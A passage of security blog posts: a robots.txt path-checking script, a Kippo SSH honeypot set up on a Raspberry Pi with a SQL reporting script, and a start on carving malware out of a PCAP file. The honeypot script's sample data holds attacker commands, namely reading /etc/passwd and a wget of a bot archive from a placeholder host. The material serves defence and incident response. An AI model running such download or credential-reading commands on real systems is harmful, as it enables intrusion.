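        results = [(url, status) for url, status in results if status == 200]
    return results


def http_status(url):
    """Live fetcher using urllib3 (the library Parsero installs). HEAD keeps it cheap, but some servers
    answer HEAD differently from GET, so re-check interesting hits with a GET before reporting them."""
    import urllib3
    return urllib3.PoolManager().request("HEAD", url, redirect=False).status


# Offline stand-in for http_status so the example runs without network access (constructed answers).
STUB_STATUS = {
    "http://www.example.com/admin/": 200,
    "http://www.example.com/backup/db.sql": 403,
    "http://www.example.com/old-site/": 404,
    "http://www.example.com/private/": 200,
}


def stub_status(url):
    return STUB_STATUS.get(url, 404)


if __name__ == "__main__":
    for url, status in check_disallows("http://www.example.com", SAMPLE_ROBOTS, stub_status):
        print(status, url)
    print(check_disallows("http://www.example.com", SAMPLE_ROBOTS, stub_status, only_available=True))
```

Swap stub_status for http_status to run it against a site you are authorised to test; a 403 is still worth noting in the report even though "-o"-style filtering hides it, since it confirms the path exists.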
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj5Boku4MYiflwFOdlB3Yykgzk7_Pa0IepARuDFs3hDGsQn5dP895YaGPkK9LMY1rUljO99G-n2ru-aTQ_u4lUJepbtV5R_vhPEuLMtPeh70AOQtPdFbNre8eYpZ894QeWISa35phLqUE/s1600/Parsero_v06_2(2).PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgj5Boku4MYiflwFOdlB3Yykgzk7_Pa0IepARuDFs3hDGsQn5dP895YaGPkK9LMY1rUljO99G-n2ru-aTQ_u4lUJepbtV5R_vhPEuLMtPeh70AOQtPdFbNre8eYpZ894QeWISa35phLqUE/s1600/Parsero_v06_2(2).PNG" height="250" width="400" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiLLZemEJRgUHdHu6OKslcM7bywxJQ2Eepn0N5QV6f9_l6T_w1acXkg2MIzcokKGkE6puMyZG23xTArKe_JnR2MaD98mJCPWwU4kjadYGUrYPhmyOVJvoPcLgaulCViAJTItqvIv3CKQN0/s1600/Parsero_v06_2%25281%2529.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><br /></a></div>
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgRKtaQSz72qaWNA5m3owuVoUvCkjwxgoTdkUdtDXzdUNOyT8CaDOxpQZbMzGXV0mxKIXAWklE9Rr6gh7-6lhxyB64ptwgpyXIFZGLt0I7R3ofPBokd_Sskev0EpfUcGm9ZiujKBps6B3k/s1600/Parsero_v06_2(1).PNG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><br /></a>
<br />
<h2>
Searching the Disallows entries in Bing</h2>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="text-align: justify;">
The fact that the administrator wrote a robots.txt file to keep crawlers away from part of the content doesn't mean that search engines haven't indexed those Disallow entries.</div>
<br />
<div style="text-align: justify;">
For example, in the picture below Parsero finds content indexed by Bing that should not have been indexed. Parsero shows the first 10 Bing results for the indexed Disallow entries.</div>
<br />
Ctrl+clicking a link opens it in your browser:<br />
<br />
<ul>
<li style="text-align: justify;">White links: the search page in Bing.</li>
<li style="text-align: justify;">Green links: directly to the result found in Bing (the content is not always available and sometimes you will get a 404 HTTP code error).</li>
</ul>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiheTz6HuWNx8fuuIYsv7gvzMh6ZWxFBnXrAui8zglW63CpxFdu1TOm6FmNrMUCtIlyuIkjO5npiP8Sncpp6zVeIyeHkAkK2RQOLryP4cLvHlrXYLfGODvKgAY9N0nSIc1jEESvXRgHhK0/s1600/Parsero_Bing_1.PNG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiheTz6HuWNx8fuuIYsv7gvzMh6ZWxFBnXrAui8zglW63CpxFdu1TOm6FmNrMUCtIlyuIkjO5npiP8Sncpp6zVeIyeHkAkK2RQOLryP4cLvHlrXYLfGODvKgAY9N0nSIc1jEESvXRgHhK0/s1600/Parsero_Bing_1.PNG" height="640" width="388" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />Javier Nieto (http://www.blogger.com/profile/05976836878834402718, noreply@blogger.com), 2 comments
<br />tag:blogger.com,1999:blog-3160485247929481680.post-7528960816663943470 | published 2014-02-04T00:16:00.000-08:00 | updated 2014-02-18T01:29:26.825-08:00
<br />SSH Honeynet: Kippo, Kali and Raspberry-PI<h2>
Kippo features </h2>
<div style="text-align: justify;">
A few months ago I got hold of an SSH honeypot called Kippo. Kippo is designed to log SSH brute-force attacks and the entire shell interaction performed by an attacker after a successful login.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
The main features of this software are:</div>
<div style="text-align: justify;">
<br /></div>
<ul style="text-align: justify;">
<li>To record the usernames and passwords the attacker tries during a brute-force attack.</li>
<li>To define a valid username/password such as "root/root" that lets the attacker into a fake filesystem (resembling Debian 5.0) where files can be added or removed, and to save every command the attacker executes.</li>
<li>To save suspicious files downloaded (via wget) by the attacker.</li>
<li>Possibility of adding a /etc/passwd file so the attacker can 'cat' it. </li>
</ul>
<h2>
Installing Kali Linux in a Raspberry-PI</h2>
<div style="text-align: justify;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHhW6RRfdb98G0nNAxC9xIOxKqM-9ujgMmi1NpizX9ST3wZWz3kUJYViBAPFuj9sFCAYqo1goBT4lPWT002Riw-ZBQ5WQn5GSJkGOe5KDBow_v2onEzcQdOg3UZCzx26edigUd51UfnSY/s1600/ra-pi.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiHhW6RRfdb98G0nNAxC9xIOxKqM-9ujgMmi1NpizX9ST3wZWz3kUJYViBAPFuj9sFCAYqo1goBT4lPWT002Riw-ZBQ5WQn5GSJkGOe5KDBow_v2onEzcQdOg3UZCzx26edigUd51UfnSY/s1600/ra-pi.png" height="120" width="200" /></a>I decided to install Kippo at home. A HoneyNet should be available 24x7x365 because the longer it is available, the more events will be captured.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You already know that a Raspberry-PI is really cheap (around 50$ all included) and has low power consumption. That is why I will show you how to install it on this device.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
Kali Linux is currently available for the Raspberry-PI, and I think it is a good idea to install our honeypot on it: we can use all the tools shipped in this distribution while Kippo is running.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
You can download Kali Linux for Raspberry-PI here: <a href="http://cdimage.kali.org/kali-latest/armel/kali-linux-1.0.5-armel-rpi.img.xz" target="_blank">kali-linux-1.0.5-armel-rpi.img.xz</a><br />
<br />
To install Kali Linux, connect the SD card to your computer. In my case I have an 8 GB SD card, and I can find out which device it shows up as by using the command below.</div>
<pre class="brush: java">sudo fdisk -l</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWJYNltbQoBv3hUwHrBk6bgXB_57nS2pGLk0ODfTH-D89dxPCYGC5aj0yurPbJG0E5gy8t7r3GDr3lu5E5TipOSmcXmiS6ZypxexLWsLQMjVXX9FFu16Bem6azaD58aiRYF5S4cqrlwNU/s1600/RasberryPI_Kali_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiWJYNltbQoBv3hUwHrBk6bgXB_57nS2pGLk0ODfTH-D89dxPCYGC5aj0yurPbJG0E5gy8t7r3GDr3lu5E5TipOSmcXmiS6ZypxexLWsLQMjVXX9FFu16Bem6azaD58aiRYF5S4cqrlwNU/s1600/RasberryPI_Kali_1.png" /></a></div>
<br />
<div style="text-align: justify;">
Once you know which device the card is (here /dev/sdb; double-check it, because dd overwrites whatever device you point it at, and use the whole card, not a partition), decompress the image and copy it to the card, then wait a while (how long depends on how fast your card is). </div>
<pre class="brush: java">unxz kali-linux-1.0.5-armel-rpi.img.xz
sudo dd if=kali-linux-1.0.5-armel-rpi.img of=/dev/sdb bs=512k</pre>
<h2>
How to install Kippo</h2>
<div style="text-align: justify;">
We won't only install Kippo, we will also install a MySQL database to save the events and Kippo-Graph to look at these events in a Web interface.</div>
<br />
Please follow these steps to install Kippo. First, install the dependencies:<br />
<pre class="brush: java">sudo apt-get install subversion python-twisted python-mysqldb apache2</pre>
1. Install MySQL<br />
<pre class="brush: java">root@kali:/# apt-get install mysql-server
root@kali:/# apt-get install mysql-client</pre>
2. Create the database and a user named kippo with all privileges on it.<br />
<pre class="brush: java">root@kali:/# mysql -h localhost -u root -p
mysql> create database kippo;
mysql> GRANT ALL ON kippo.* TO 'kippo'@'localhost' IDENTIFIED BY 'Kippo-password';
exit</pre>
3. Download Kippo from <a href="http://kippo.googlecode.com/files/kippo-0.8.tar.gz" target="_blank">http://kippo.googlecode.com/files/kippo-0.8.tar.gz</a> and uncompress it in /usr/local/src/.<br />
<br />
4. Create the tables using the user just created.<br />
<pre class="brush: java">root@kali:/# cd /usr/local/src/kippo-0.8/doc/sql/
root@kali:/usr/local/src/kippo-0.8/doc/sql# mysql -u kippo -p
mysql> use kippo;
mysql> source mysql.sql;
mysql> show tables;
mysql> exit
</pre>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivHqDEGZSOGNUj3K87KcBziklZppwG-QQI-cQmRYc225eBLKXXgqY9P0-PIxr6KDGzGRFX1hbD_P6SJgVkpdHvLMT_m29LiNDszBzMPgwPc1dky0G0yqc96oB9BWfJBjKV7tGqYG8_Hsk/s1600/Kali_Kippo_Database.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEivHqDEGZSOGNUj3K87KcBziklZppwG-QQI-cQmRYc225eBLKXXgqY9P0-PIxr6KDGzGRFX1hbD_P6SJgVkpdHvLMT_m29LiNDszBzMPgwPc1dky0G0yqc96oB9BWfJBjKV7tGqYG8_Hsk/s1600/Kali_Kippo_Database.png" /></a></div>
<br />
5. Add the lines below to kippo.cfg (if that file does not exist yet, copy kippo.cfg.dist to kippo.cfg first).<br />
<pre class="brush: java">[database_mysql]
host = localhost
database = kippo
username = kippo
password = Kippo-password</pre>
6. Create an unprivileged user to run Kippo and give it ownership of the folder. The honeypot process needs no administrative rights, so do not put this user in the sudo group.<br />
<pre class="brush: java">root@kali:/# useradd -d /home/kippo -s /bin/bash -m kippo
root@kali:/# chown -R kippo /usr/local/src/kippo-0.8/</pre>
7. Install the packages required for Kippo-Graph.<br />
<pre class="brush: java">sudo apt-get update
sudo apt-get install libapache2-mod-php5 php5-cli php5-common php5-cgi php5-mysql php5-gd
</pre>
8. Download Kippo-Graph<br />
<pre class="brush: java">root@kali:/# wget http://bruteforce.gr/wp-content/uploads/kippo-graph-0.8.tar
root@kali:/# mv kippo-graph-0.8.tar /var/www/
root@kali:/# cd /var/www/
root@kali:/var/www# tar xvf kippo-graph-0.8.tar --no-same-permissions
root@kali:/var/www# cd kippo-graph/
root@kali:/var/www/kippo-graph# chmod 777 generated-graphs
root@kali:/var/www/kippo-graph# vim config.php    # enter the database host, name, user and password from step 2
root@kali:/var/www/kippo-graph# /etc/init.d/apache2 restart
</pre>
9. Start Kippo<br />
<pre class="brush: java">root@kali:/usr/local/src/kippo-0.8# su kippo
kippo@kali:/usr/local/src/kippo-0.8$ ./start.sh</pre>
<br />
<div style="text-align: justify;">
With Kippo installed, you need to expose the service to the Internet. By default, Kippo listens on port 2222, which is what lets it run as an unprivileged user. You can expose it with a port forward (PAT) on your router, redirecting port 22 on the external IP to port 2222 on Kippo's internal (private) IP, so attackers see a normal SSH port while the Raspberry-PI's real sshd stays unexposed.</div>
<h2>
Looking at the graphs</h2>
<div style="text-align: justify;">
To see the graphs, just browse to http://Raspberry-Pi_IP_Address/kippo-graph/</div>
<br />
You will see these graphs:<br />
<br />
<ul>
<li>Top 10 passwords</li>
<li>Top 10 usernames</li>
<li>Top 10 user-pass combos</li>
<li>Success ratio</li>
<li>Successes per day/week</li>
<li>Connections per IP for previous month</li>
<li>Successful logins from the same IP</li>
<li>Probes per day/week</li>
<li>Top 10 SSH clients</li>
<li>Human activity inside the honeypot</li>
<li>Top 10 input (overall)</li>
<li>Top 10 successful input</li>
<li>Top 10 failed input</li>
<li>passwd commands</li>
<li>wget commands</li>
<li>Executed scripts</li>
<li>Interesting commands</li>
<li>apt-get commands</li>
<li>Top 10 IP addresses probing the system for previous month</li>
<li>Total IP addresses probing the system per top 10 countries</li>
</ul>
<br />
Some examples here:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOSIPe3Er9sqOlQzvB6tQItDJ3I2m4AvatDpPDonJryM9jkhmLTvDgH_qyNYlb6IOJcfNqJJ1_wtoudKO6WEke1CjNHxfIDfArF2UNn42yq4QhRExal_Ge9IJ9agd9hdCNXp-5rBN49TA/s1600/Kippo_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiOSIPe3Er9sqOlQzvB6tQItDJ3I2m4AvatDpPDonJryM9jkhmLTvDgH_qyNYlb6IOJcfNqJJ1_wtoudKO6WEke1CjNHxfIDfArF2UNn42yq4QhRExal_Ge9IJ9agd9hdCNXp-5rBN49TA/s1600/Kippo_1.png" height="242" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpOqFL5Z9WOfh2mcyfMMyBRRw7FA1y3ugMEzRbWrzp0GgRx48IIeIDfahQnSLpSGve_K0rnJkl6sJkspkzJ4VBCPC_t9tsRB-VkXGQ6EV4-M_yu2Ec6Rq7uX9poLgaMojnemgfzECBu5Y/s1600/Kippo_2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhpOqFL5Z9WOfh2mcyfMMyBRRw7FA1y3ugMEzRbWrzp0GgRx48IIeIDfahQnSLpSGve_K0rnJkl6sJkspkzJ4VBCPC_t9tsRB-VkXGQ6EV4-M_yu2Ec6Rq7uX9poLgaMojnemgfzECBu5Y/s1600/Kippo_2.png" height="236" width="640" /></a></div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigtNBy_UrbSkzzlMOabdWYg_NRw3gmUuOWECoySK-fv8BJkPrVeR1JfMNexcRTLyPeMnyS6au4heXiyPhfmapJD3eK-zKGfqug69rOOiMUakaou34-OSlvn9y2S7Wx3AFIDFzOLn-92hA/s1600/Kippo_Gallery.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEigtNBy_UrbSkzzlMOabdWYg_NRw3gmUuOWECoySK-fv8BJkPrVeR1JfMNexcRTLyPeMnyS6au4heXiyPhfmapJD3eK-zKGfqug69rOOiMUakaou34-OSlvn9y2S7Wx3AFIDFzOLn-92hA/s1600/Kippo_Gallery.png" height="418" width="640" /></a></div>
<br />
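<div style="text-align: justify;">
The graphs above are just SQL over the tables created in step 4. As an added example (not code from this post, from Kippo or from Kippo-Graph), the script below computes several of them directly: top passwords, user/password combos, success ratio, connections and successful logins per IP, wget commands and the duration of interactive sessions. It assumes the table and column names of Kippo 0.8's doc/sql/mysql.sql, reduced to the columns it uses, and runs against an in-memory SQLite copy of that schema filled with constructed rows, so it works offline; on the honeypot the same SELECTs can be pointed at the MySQL kippo database (only the julianday() call is SQLite-specific).</div>

```python
"""The numbers behind several Kippo-Graph charts, computed directly from the
tables that kippo's doc/sql/mysql.sql creates. Added example: runs offline
against an in-memory SQLite copy of the schema filled with constructed rows;
on the honeypot itself, point the same SELECTs at the MySQL 'kippo' database."""
import sqlite3

# Assumption: mirrors Kippo 0.8's sessions/auth/input tables, reduced to the
# columns the queries below need (MySQL types mapped onto SQLite's).
SCHEMA = """
CREATE TABLE sessions (id TEXT PRIMARY KEY, starttime TEXT, endtime TEXT,
                       sensor INTEGER, ip TEXT, termsize TEXT, client INTEGER);
CREATE TABLE auth (id INTEGER PRIMARY KEY, session TEXT, success INTEGER,
                   username TEXT, password TEXT, timestamp TEXT);
CREATE TABLE input (id INTEGER PRIMARY KEY, session TEXT, timestamp TEXT,
                    realm TEXT, success INTEGER, input TEXT);
"""

# Constructed sample data (RFC 5737 addresses): two brute-force sessions
# from one IP and one successful login that goes on to run commands.
SESSIONS = [
    ("s1", "2014-02-03 10:00:00", "2014-02-03 10:00:05", 1, "203.0.113.10", None, 1),
    ("s2", "2014-02-03 10:01:00", "2014-02-03 10:01:09", 1, "203.0.113.10", None, 1),
    ("s3", "2014-02-03 11:30:00", "2014-02-03 11:42:00", 1, "198.51.100.7", "80x24", 2),
]
AUTH = [  # (session, success, username, password, timestamp)
    ("s1", 0, "root", "123456", "2014-02-03 10:00:01"),
    ("s1", 0, "root", "password", "2014-02-03 10:00:03"),
    ("s2", 0, "admin", "admin", "2014-02-03 10:01:02"),
    ("s2", 0, "root", "123456", "2014-02-03 10:01:05"),
    ("s3", 1, "root", "root", "2014-02-03 11:30:02"),
]
INPUT = [  # (session, timestamp, realm, success, input)
    ("s3", "2014-02-03 11:30:10", None, 1, "cat /etc/passwd"),
    ("s3", "2014-02-03 11:30:20", None, 1, "wget http://203.0.113.99/x/bot.tgz"),
    ("s3", "2014-02-03 11:30:40", None, 0, "chmod +x bot.tgz"),
]

QUERIES = {
    "top_passwords": """SELECT password, COUNT(*) AS n FROM auth
                        GROUP BY password ORDER BY n DESC, password LIMIT 10""",
    "top_combos": """SELECT username || '/' || password AS combo, COUNT(*) AS n
                     FROM auth GROUP BY combo ORDER BY n DESC, combo LIMIT 10""",
    "success_ratio": """SELECT SUM(success) AS ok, COUNT(*) - SUM(success) AS failed,
                        ROUND(100.0 * SUM(success) / COUNT(*), 1) AS pct FROM auth""",
    "connections_per_ip": """SELECT ip, COUNT(*) AS n FROM sessions
                             GROUP BY ip ORDER BY n DESC, ip LIMIT 10""",
    "successful_logins_from_ip": """SELECT s.ip, COUNT(*) AS n FROM auth a
                                    JOIN sessions s ON s.id = a.session
                                    WHERE a.success = 1 GROUP BY s.ip ORDER BY n DESC""",
    "wget_commands": """SELECT timestamp, input FROM input
                        WHERE input LIKE 'wget %' ORDER BY timestamp""",
    # julianday() is SQLite-only; on MySQL use TIMESTAMPDIFF(SECOND, ...).
    "human_activity": """SELECT s.id, s.ip,
                         ROUND((julianday(s.endtime) - julianday(s.starttime)) * 86400) AS seconds,
                         (SELECT COUNT(*) FROM input i WHERE i.session = s.id) AS commands
                         FROM sessions s
                         WHERE EXISTS (SELECT 1 FROM input i WHERE i.session = s.id)
                         ORDER BY s.starttime""",
}


def load_sample_db():
    """Create the schema in memory and load the constructed rows."""
    con = sqlite3.connect(":memory:")
    con.executescript(SCHEMA)
    con.executemany("INSERT INTO sessions VALUES (?,?,?,?,?,?,?)", SESSIONS)
    con.executemany("INSERT INTO auth (session, success, username, password, timestamp) "
                    "VALUES (?,?,?,?,?)", AUTH)
    con.executemany("INSERT INTO input (session, timestamp, realm, success, input) "
                    "VALUES (?,?,?,?,?)", INPUT)
    return con


def report(con):
    """Run every query and return {chart name: list of result rows}."""
    return {name: con.execute(sql).fetchall() for name, sql in QUERIES.items()}


if __name__ == "__main__":
    for name, rows in report(load_sample_db()).items():
        print(name)
        for row in rows:
            print("   ", row)
```

<div style="text-align: justify;">
Each ORDER BY carries a tie-breaker column on purpose: without it a "top 10" list is nondeterministic whenever two passwords or IPs have the same count, which makes day-to-day comparisons of the charts misleading.</div>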
<h2>
The best feature</h2>
<div style="text-align: justify;">
In my opinion, the best Kippo feature is its ability to offer the attacker a fake filesystem and to save every command the intruder executes after a "successful" login.</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
This is where you collect malware samples and new scripts written by attackers. You will have a great opportunity to learn about new attacker trends!</div>
<div style="text-align: justify;">
<br /></div>
In the file "/usr/local/src/kippo-0.8/data/userdb.txt" you set the username/password combinations "allowed" to get access to the fake system, one per line in username:uid:password format. You could add "root:0:root" or whatever you want the attacker to be able to log in with.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilQRHFWHh0BW_270EMCeqnML792CbfTmd6feSa3elezsPdPZjcr2El_ecsjZa9qeiIaSewK3vPyM0TDqAHbnT51UwNWX0UkLvrdbVIb0hRfjsLXwRkmBM3zysyx1Sh-IJ1zBX0cweb3zE/s1600/Kippo_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEilQRHFWHh0BW_270EMCeqnML792CbfTmd6feSa3elezsPdPZjcr2El_ecsjZa9qeiIaSewK3vPyM0TDqAHbnT51UwNWX0UkLvrdbVIb0hRfjsLXwRkmBM3zysyx1Sh-IJ1zBX0cweb3zE/s1600/Kippo_4.png" height="294" width="640" /></a><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXOR40KY71l8fEDTTacc20fS80hcLTFsN_Fk3Kvy6YGt3i5vGSqqeuQIxNj2RVF5TesV8-GSc4GDIshG12FGbhs6Rh7HGySjfi1RzYpz5one3z_5Jsregem_-CqtfdNOdRozG2VQFvmX8/s1600/Kippo_3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjXOR40KY71l8fEDTTacc20fS80hcLTFsN_Fk3Kvy6YGt3i5vGSqqeuQIxNj2RVF5TesV8-GSc4GDIshG12FGbhs6Rh7HGySjfi1RzYpz5one3z_5Jsregem_-CqtfdNOdRozG2VQFvmX8/s1600/Kippo_3.png" height="246" width="640" /></a> </div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
Javier Nietohttp://www.blogger.com/profile/05976836878834402718noreply@blogger.com7tag:blogger.com,1999:blog-3160485247929481680.post-92126038512068139412014-01-21T03:54:00.001-08:002014-01-22T00:07:01.056-08:00Extracting files from a network traffic capture (PCAP)<div style="text-align: justify;">
When we are involved in incident handling and are in charge of analyzing a traffic capture in pcap format related to an attack, one of the things we usually need to do is recover the files that were downloaded. The reason is that we need a copy of the malware or the exploit in order to analyze it by reverse engineering or similar...</div>
<div style="text-align: justify;">
<br /></div>
<div style="text-align: justify;">
We can usually identify the original sources these files were downloaded from just by analyzing the pcap file, but they disappear from where they were hosted within a short time. Because of that, we need to extract them directly from the pcap file.</div>
<br />
<div style="text-align: justify;">
In this post, I will show you three different ways to achieve this goal using the pcap hosted by Barracuda related to the <a href="http://www.behindthefirewalls.com/2013/10/analysis-attack-technical-analysis-php.html" target="_blank">www.php.net compromise</a>, which can be downloaded here:<br />
<a href="http://barracudalabs.com/downloads/5f810408ddbbd6d349b4be4766f41a37.pcap" target="_blank">http://barracudalabs.com/downloads/5f810408ddbbd6d349b4be4766f41a37.pcap</a></div>
<br />
<h3>
Wireshark</h3>
As you know, Wireshark is the most popular network protocol analyzer. It is also capable of extracting the files that were downloaded and captured.<br />
<br />
If you load the pcap file in Wireshark and apply the display filter below (it matches the "This program cannot be run in DOS mode" stub that Windows PE executables carry)...<br />
<pre class="brush: java">http contains "in DOS mode"</pre>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLoAUdKjElZrwdiMbtTCHig4ye5Lsdph4Hs8BmEmCiXIVkjrk2wR2RZuMBBCjYUxxSS4smJijgkqaSIijKo-pXrOSVa8cZHhH00FRPq2rcR97kIeQKJ0bSpR9-y3MTKsHL8tYc3vZjAGM/s1600/Wireshark_extracting_1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgLoAUdKjElZrwdiMbtTCHig4ye5Lsdph4Hs8BmEmCiXIVkjrk2wR2RZuMBBCjYUxxSS4smJijgkqaSIijKo-pXrOSVa8cZHhH00FRPq2rcR97kIeQKJ0bSpR9-y3MTKsHL8tYc3vZjAGM/s640/Wireshark_extracting_1.png" height="177" width="640" /></a></div>
<br />
... you can check that some executables were downloaded.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirH0OhBcURw36YlwP8G_368bmNRYIsG2REHM95zC0_0jEf1FH49_tlvpXYI7Bml2m8A0rUTbc-G5m8JtnVD1Ikw5l7NXUPL_FT9Yj1-qVMaL6jCHeIoXDI9tomYeSCuFfQFfBXYCcybRI/s1600/Wireshark_extracting_22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEirH0OhBcURw36YlwP8G_368bmNRYIsG2REHM95zC0_0jEf1FH49_tlvpXYI7Bml2m8A0rUTbc-G5m8JtnVD1Ikw5l7NXUPL_FT9Yj1-qVMaL6jCHeIoXDI9tomYeSCuFfQFfBXYCcybRI/s1600/Wireshark_extracting_22.png" /></a></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
We can recover all the files transferred over HTTP (executables, pictures, JavaScript, etc.) through File --> Export Objects --> HTTP and clicking on "Save All".<br />
<div class="separator" style="clear: both; text-align: center;">
</div>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTrUcfvGCW1_7SJ9xwJWE5p5JAjbsde2ykRrZvmUrcOmGtCjS5P7htEugQJxDfJjUQLP0iKBPL1hgqUENxZXupeUjeRhARPD_-zayC4ogbkZwBL4gUpnMlIBb0ChmavAhy8MCs1Xqojw/s1600/Wireshark_extracting_4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhNTrUcfvGCW1_7SJ9xwJWE5p5JAjbsde2ykRrZvmUrcOmGtCjS5P7htEugQJxDfJjUQLP0iKBPL1hgqUENxZXupeUjeRhARPD_-zayC4ogbkZwBL4gUpnMlIBb0ChmavAhy8MCs1Xqojw/s640/Wireshark_extracting_4.png" height="307" width="640" /></a></div>
<br />
The picture below shows the files that have been recovered.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFSfa90dYzx9NLNSfCX98a2T7ytARzCSmHdIbt2iJIeg6ztbCICuR_OEH67Qv1w_CfEM8F40u9r6fj7dRPKDtlo7Mi99D8OCTr6pfIj_4YhSiUIMPSRfy8xu8WdCye7G6gFnofLS0rQ44/s1600/Wireshark_extracting_5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgFSfa90dYzx9NLNSfCX98a2T7ytARzCSmHdIbt2iJIeg6ztbCICuR_OEH67Qv1w_CfEM8F40u9r6fj7dRPKDtlo7Mi99D8OCTr6pfIj_4YhSiUIMPSRfy8xu8WdCye7G6gFnofLS0rQ44/s640/Wireshark_extracting_5.png" height="86" width="640" /></a></div>
<br />
We use the command shown in the picture below to keep only the executables.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz_AGG4OaPncp_yZJn2vRCw-vV6HRtZv-ib8VFkZh4CeBNbTLRs-hX0Ujv7gPyKQ_gdCtyAVuNeLCEVSagpzMt8AMK2EEZ3GzfWuVhD3wRWq2sTUSsiljcip5xDcw2H8kLS0eq6S67boA/s1600/Wireshark_extracting_6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjz_AGG4OaPncp_yZJn2vRCw-vV6HRtZv-ib8VFkZh4CeBNbTLRs-hX0Ujv7gPyKQ_gdCtyAVuNeLCEVSagpzMt8AMK2EEZ3GzfWuVhD3wRWq2sTUSsiljcip5xDcw2H8kLS0eq6S67boA/s640/Wireshark_extracting_6.png" height="82" width="640" /></a></div>
<br />
<div style="text-align: justify;">
If we upload these files to VirusTotal, we can check that all of them have been flagged as malicious.</div>
<br />
<div style="text-align: center;">
<a href="https://www.virustotal.com/en/file/d78fb2c23422471657a077ff68906d6f6b639d7b7b00ef269fa3a2ce1b38710a/analysis/" target="_blank">https://www.virustotal.com/en/<wbr></wbr>file/<wbr></wbr>d78fb2c23422471657a077ff68906d<wbr></wbr>6f6b639d7b7b00ef269fa3a2ce1b38<wbr></wbr>710a/analysis/</a><br />
<br />
